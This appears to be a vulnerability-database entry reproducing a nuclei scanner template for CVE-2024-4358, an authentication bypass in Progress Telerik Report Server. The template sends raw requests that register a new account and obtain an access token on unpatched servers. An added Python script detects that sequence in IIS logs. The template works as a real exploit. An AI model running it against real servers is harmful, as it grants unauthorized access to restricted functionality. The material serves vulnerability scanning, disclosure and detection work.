Progress Telerik Report Server - Authentication Bypass

28 Jun 2026 15:08:32. Reported by ProjectDiscovery. Type: nuclei. Source: github.com. 44 views.

Progress Telerik Report Server authentication bypass on IIS, version 2024 Q1 (10.0.24.305) or earlier.

Code
id: CVE-2024-4358

info:
  name: Progress Telerik Report Server - Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
  impact: An unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
  remediation: Updating to Report Server 2024 Q2 (10.1.24.514) or later.
  reference:
    - https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/
    - https://github.com/sinsinology/CVE-2024-4358
    - https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358
  classification:
    epss-score: 0.97482
    epss-percentile: 0.99892
    cpe: cpe:2.3:a:progress:telerik_report_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: title:"Log in | Telerik Report Server"
    product: telerik_report_server
    vendor: progress
  tags: cve,cve2024,telerik,progress,auth-bypass,intrusive,kev,vkev,vuln
variables:
  user: "{{rand_base(6)}}"
  pass: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /Startup/Register HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        Username={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}}

      - |
        POST /Token HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        grant_type=password&username={{user}}&password={{pass}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type_2, "application/json")'
          - 'contains_all(body_2, "access_token", "userName", "token_type")'
          - 'status_code_2 == 200'
        condition: and

    extractors:
      - type: regex
        name: token
        part: body_2
        group: 1
        regex:
          - '"access_token":"([A-Z0-9a-z_-]+)"'
        internal: true

      - type: dsl
        dsl:
          - '"Username: "+ user'
          - '"Password: "+ pass'
# digest: 490a00463044022034340e6059231d4dec4294216f07e5bac711758706a71191d1b89348aff21b3a022067c1e310bb5d582bc4a5a431bc469b49b3765dbf73227d4d017b636b59182bea:922c64590222798bb761d5b6d8e72950
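As an added defender-side example (not code from the nuclei template or the Vulners page), the following Python script scans IIS W3C log lines for the same two-step sequence the template sends: a POST to /Startup/Register followed shortly by a successful POST to /Token from the same client IP. The log lines and the field layout in the #Fields header are constructed assumptions.

```python
"""Detect the CVE-2024-4358 bypass pattern in IIS W3C logs (added example,
not from the nuclei template or the Vulners page): flag a client that POSTs to
/Startup/Register and then obtains a token via POST /Token shortly after."""
from datetime import datetime, timedelta

# Constructed sample IIS W3C log; the field layout is an assumption.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2024-06-01 10:00:01 10.0.0.5 GET /Startup/Register - 443 - 198.51.100.7 200
2024-06-01 10:00:02 10.0.0.5 POST /Startup/Register - 443 - 198.51.100.7 302
2024-06-01 10:00:03 10.0.0.5 POST /Token - 443 - 198.51.100.7 200
2024-06-01 10:05:00 10.0.0.5 POST /Token - 443 - 203.0.113.9 200
2024-06-01 10:06:00 10.0.0.5 POST /Token - 443 - 203.0.113.9 400
"""

WINDOW = timedelta(minutes=5)  # registration-to-token gap worth flagging

def parse_iis(text):
    """Yield one dict per record, mapping columns via the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue  # directives, blank lines, or records before any header
        else:
            yield dict(zip(fields, line.split()))

def find_bypass_sequences(text, window=WINDOW):
    """Return (client_ip, register_time, token_time) for each client that
    self-registered and then got a token within `window`."""
    registrations = {}  # c-ip -> time of last accepted POST /Startup/Register
    hits = []
    for rec in parse_iis(text):
        ts = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        ip, method = rec["c-ip"], rec["cs-method"]
        path, status = rec["cs-uri-stem"].lower(), rec["sc-status"]
        if method == "POST" and path == "/startup/register" and status[0] in "23":
            registrations[ip] = ts
        elif method == "POST" and path == "/token" and status == "200":
            reg = registrations.get(ip)
            if reg is not None and ts - reg <= window:
                hits.append((ip, reg.isoformat(), ts.isoformat()))
    return hits

if __name__ == "__main__":
    for hit in find_bypass_sequences(SAMPLE_LOG):
        print("possible CVE-2024-4358 exploitation:", hit)
```

On a patched server (2024 Q2, 10.1.24.514 or later) the registration POST should no longer be accepted, so a hit is a strong signal that the endpoint is still exposed.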


Scores (as of 04 Feb 2026 07:00):
Vulners AI Score: 7.6 (High risk)
CVSS 3.1: 9.8 - 9.9
EPSS: 0.97482